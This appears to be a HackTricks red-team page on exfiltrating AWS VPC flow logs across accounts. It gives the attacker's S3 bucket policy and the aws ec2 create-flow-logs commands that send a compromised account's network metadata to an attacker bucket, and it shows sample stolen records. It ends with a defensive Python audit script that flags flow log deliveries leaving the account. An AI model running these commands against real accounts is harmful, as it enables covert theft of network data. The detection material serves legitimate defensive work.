AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Tip

Learn and practise AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practise GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practise Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Summary

Abuse ec2:CreateFlowLogs to export VPC, subnet or ENI flow logs directly to an attacker-controlled S3 bucket. Once the delivery is configured to write to the external bucket, every connection seen on the monitored resource is streamed out of the victim account.

Requirements

  • Victim principal: ec2:CreateFlowLogs, ec2:DescribeFlowLogs, and iam:PassRole (if a delivery role is required/created).
  • Attacker bucket: S3 policy that trusts delivery.logs.amazonaws.com with s3:PutObject and bucket-owner-full-control.
  • Optional: logs:DescribeLogGroups if exporting to CloudWatch instead of S3 (not needed here).

Attack step by step

  1. Attacker sets up an S3 bucket policy (in the attacker account) that allows the VPC Flow Logs delivery service to write objects. Replace the placeholders before applying it:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowVPCFlowLogsDelivery",
      "Effect": "Allow",
      "Principal": { "Service": "delivery.logs.amazonaws.com" },
      "Action": "s3:PutObject",
      "Resource": "arn:aws:s3:::<attacker-bucket>/flowlogs/*",
      "Condition": {
        "StringEquals": { "s3:x-amz-acl": "bucket-owner-full-control" }
      }
    }
  ]
}

Apply it from the attacker account:

aws s3api put-bucket-policy \
  --bucket <attacker-bucket> \
  --policy file://flowlogs-policy.json
  2. Victim (compromised principal) creates the flow logs targeting the attacker bucket:

REGION=us-east-1
VPC_ID=<vpc-xxxxxxxx>
ROLE_ARN=<delivery-role-with-logs-permissions>   # Must allow delivery.logs.amazonaws.com to assume it
aws ec2 create-flow-logs \
  --resource-type VPC \
  --resource-ids "$VPC_ID" \
  --traffic-type ALL \
  --log-destination-type s3 \
  --log-destination arn:aws:s3:::<attacker-bucket>/flowlogs/ \
  --deliver-logs-permission-arn "$ROLE_ARN" \
  --region "$REGION"

Within minutes, flow log files appear in the attacker bucket containing the connections of every ENI in the monitored VPC/subnet.

Evidence

Example flow log records written to the attacker bucket:

version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
2 947247140022 eni-074cdc68182fb7e4d 52.217.123.250 10.77.1.240 443 48674 6 2359 3375867 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 52.217.123.250 48674 443 6 169 7612 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 54.231.199.186 10.77.1.240 443 59604 6 34 33539 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 10.77.1.240 54.231.199.186 59604 443 6 18 1726 1759874460 1759874487 ACCEPT OK
2 947247140022 eni-074cdc68182fb7e4d 16.15.204.15 10.77.1.240 443 57868 6 162 1219352 1759874460 1759874487 ACCEPT OK

Bucket listing as evidence:

aws s3 ls s3://<attacker-bucket>/flowlogs/ --recursive --human-readable --summarize

Impact

  • Continuous exfiltration of network metadata (source/destination IP addresses, ports, protocols) for the monitored VPC/subnet/ENI.
  • Enables traffic analysis, identification of sensitive services and potential hunting for security group misconfigurations from outside the affected account.
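From the defender's side, the technique above leaves a durable trace: the flow log configuration itself, visible through ec2:DescribeFlowLogs. The following audit script is an added example (not part of the original page or of any AWS tooling); it walks a constructed sample of describe-flow-logs output and flags entries whose S3 destination bucket is not on an allowlist of known logging buckets, or whose delivery role lives in a foreign account. The bucket names, account IDs and flow log IDs in the sample are placeholders.

```python
"""Audit `aws ec2 describe-flow-logs` output for deliveries that leave the account."""
import re

# Account ID embedded in an IAM role ARN; bucket name in an S3 ARN.
ROLE_ACCOUNT = re.compile(r"^arn:aws:iam::(\d{12}):role/")
S3_BUCKET = re.compile(r"^arn:aws:s3:::([^/]+)")


def audit_flow_logs(flow_logs, allowed_buckets, own_account):
    """Return (FlowLogId, reason) findings for entries that deliver outside the account.

    flow_logs: the "FlowLogs" list from describe-flow-logs (dicts).
    allowed_buckets: set of bucket names that are approved flow log sinks.
    own_account: this account's 12-digit ID, used to check the delivery role.
    """
    findings = []
    for fl in flow_logs:
        fl_id = fl.get("FlowLogId", "?")
        if fl.get("LogDestinationType") == "s3":
            m = S3_BUCKET.match(fl.get("LogDestination") or "")
            bucket = m.group(1) if m else None
            if bucket not in allowed_buckets:
                findings.append((fl_id, f"s3 destination bucket not allowlisted: {bucket}"))
        # A delivery role from another account is a strong cross-account signal.
        m = ROLE_ACCOUNT.match(fl.get("DeliverLogsPermissionArn") or "")
        if m and m.group(1) != own_account:
            findings.append((fl_id, f"delivery role in foreign account {m.group(1)}"))
    return findings


# Constructed sample shaped like describe-flow-logs output (placeholder IDs, not real ones).
SAMPLE = [
    {"FlowLogId": "fl-0aaa", "ResourceId": "vpc-0aaa", "LogDestinationType": "s3",
     "LogDestination": "arn:aws:s3:::corp-central-logs/vpcflow/",
     "DeliverLogsPermissionArn": None},
    {"FlowLogId": "fl-0bbb", "ResourceId": "vpc-0aaa", "LogDestinationType": "s3",
     "LogDestination": "arn:aws:s3:::attacker-bucket/flowlogs/",
     "DeliverLogsPermissionArn": "arn:aws:iam::999999999999:role/flowlogs-delivery"},
    {"FlowLogId": "fl-0ccc", "ResourceId": "eni-0ccc", "LogDestinationType": "cloud-watch-logs",
     "LogGroupName": "/vpc/flowlogs",
     "DeliverLogsPermissionArn": "arn:aws:iam::111111111111:role/flowlogs-to-cw"},
]

if __name__ == "__main__":
    # Only fl-0bbb is reported: unknown bucket and a role from account 999999999999.
    for fl_id, reason in audit_flow_logs(SAMPLE, {"corp-central-logs"}, "111111111111"):
        print(fl_id, reason)
```

Run it against live data by feeding `aws ec2 describe-flow-logs --query FlowLogs` output into `audit_flow_logs`, and pair it with a CloudTrail alert on the CreateFlowLogs event name so a new delivery is caught when it is created rather than at the next audit.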
